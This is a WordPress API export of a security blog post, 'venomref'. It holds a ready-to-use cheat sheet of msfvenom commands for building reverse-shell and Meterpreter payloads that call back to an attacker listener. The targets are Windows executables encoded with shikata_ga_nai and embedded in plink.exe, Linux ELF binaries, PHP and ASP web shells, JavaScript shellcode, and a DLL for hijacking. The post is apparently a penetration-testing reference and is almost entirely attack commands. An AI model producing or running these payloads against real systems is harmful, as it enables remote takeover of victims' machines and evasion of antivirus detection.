{"id":572,"date":"2023-07-08T15:07:28","date_gmt":"2023-07-08T15:07:28","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=572"},"modified":"2023-07-08T15:09:44","modified_gmt":"2023-07-08T15:09:44","slug":"venomref","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/venomref\/","title":{"rendered":"venomref"},"content":{"rendered":"\n<p><strong>.bashrc<\/strong><br>alias venomref='clear ; cat $HOME\/ref\/venomref'<\/p>\n\n\n\n<div class=\"wp-block-cover aligncenter\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><img loading=\"lazy\" decoding=\"async\" width=\"1456\" height=\"816\" class=\"wp-block-cover__image-background wp-image-573\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2023\/07\/venomref.png\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-center has-large-font-size\">venomref<\/p>\n<\/div><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>venomref (flat file):<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-medium-font-size\"><code>&#91;+ WINDOWS ENCODED PAYLOADS ] PORT 443\n====CHANGE. IP. AS. 
NEEDED.====\n\nWINDOWS\/SHELL\/REVERSE_TCP &#91;PORT 443]\nmsfvenom -p windows\/shell\/reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_86.exe\n\nWINDOWS\/SHELL_REVERSE_TCP (NETCAT x86) &#91;PORT 443]\nmsfvenom -p windows\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_86.exe\n\nWINDOWS\/SHELL_REVERSE_TCP (NETCAT x64) &#91;PORT 443]\nmsfvenom -p windows\/x64\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x64 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_86.exe\n\nWINDOWS\/METERPRETER\/REVERSE_TCP (x86) &#91;PORT 443] AT 10.0.0.67:\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_86.exe\n\nWINDOWS\/METERPRETER\/REVERSE_TCP (x64) &#91;PORT 443] AT 10.0.0.67:\nmsfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=443 --platform windows -a x64 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o reverse_encoded_64.exe\n\n\n---===BIND SHELL, ENCODED, ON PORT 1234===---\nmsfvenom -p windows\/shell_bind_tcp LHOST=10.0.0.67 LPORT=1234 --platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o bindshell_1234_encoded_86.exe\n\nCode for encoding:\n--platform windows -a x86 -f exe -e x86\/shikata_ga_nai -i 9 -x \/usr\/share\/windows-binaries\/plink.exe -o payload_86.exe\n\n================================================================================\n&#91;+ LINUX ]\nLINUX\/x86\/METERPRETER\/REVERSE_TCP\nmsfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=9997 -f elf >reverse.elf\n\nNETCAT\nmsfvenom -p 
linux\/x86\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=1234 -f elf >reverse.elf\n================================================================================\n\n&#91;+ PHP ]\nPHP\/METERPRETER_REVERSE_TCP &#91;PORT 443]\nmsfvenom -p php\/meterpreter_reverse_tcp LHOST=10.0.0.67 LPORT=443 -f raw > shell.php\ncat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\\n' > shell.php &amp;&amp; pbpaste >> shell.php\n\nPHP\/METERPRETER\/REVERSE_TCP &#91;PORT 443]\nmsfvenom -p php\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=443 -f raw > shell.php\ncat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\\n' > shell.php &amp;&amp; pbpaste >> shell.php\n\nPHP\/REVERSE_PHP &#91;PORT 443]\nmsfvenom -p php\/reverse_php LHOST=10.0.0.67 LPORT=443 -f raw > shell.php\ncat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\\n' > shell.php &amp;&amp; pbpaste >> shell.php\n================================================================================\n\n&#91;+ ASP]\nASP-REVERSE-PAYLOAD &#91;PORT 443]\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.0.0.67 LPORT=443 -f asp > shell.asp\n\nOR FOR NETCAT &#91;PORT 443]\nmsfvenom -p windows\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=443 -f asp > shell.asp\n\n================================================================================\n&#91;+ Client-Side, Unicode Payload - For use with Internet Explorer and IE]\nmsfvenom -p windows\/shell_reverse_tcp LHOST=192.168.30.5 LPORT=443 -f js_le -e generic\/none\n\n#Note: To keep things the same size, if needed add NOPs at the end of the payload.\n#A Unicode NOP is - %u9090\n\n================================================================================\n===SHELLCODE GENERATION:\n================================================================================\n--===--\nmsfvenom -p windows\/shell_reverse_tcp LHOST=10.0.0.67 LPORT=80 EXITFUNC=thread -f python -a x86 --platform windows -b '\\x00' -e 
x86\/shikata_ga_nai\n--===--\n================================================================================\n#DLL HiJacking - Windows - x64\nmsfvenom -a x64 -p windows\/x64\/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll\n================================================================================<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>.bashrcalias venomref='clear ; cat $HOME\/ref\/venomref' venomref (flat file):<\/p>\n","protected":false},"author":1,"featured_media":573,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[51,96,97,95,4,94],"class_list":["post-572","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-msf","tag-msfvenom","tag-payloads","tag-reverse-shell","tag-s1ren","tag-venomref"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=572"}],"version-history":[{"count":2,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/572\/revisions"}],"predecessor-version":[{"id":575,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/572\/revisions\/575"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/573"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=572"},{"taxo
nomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}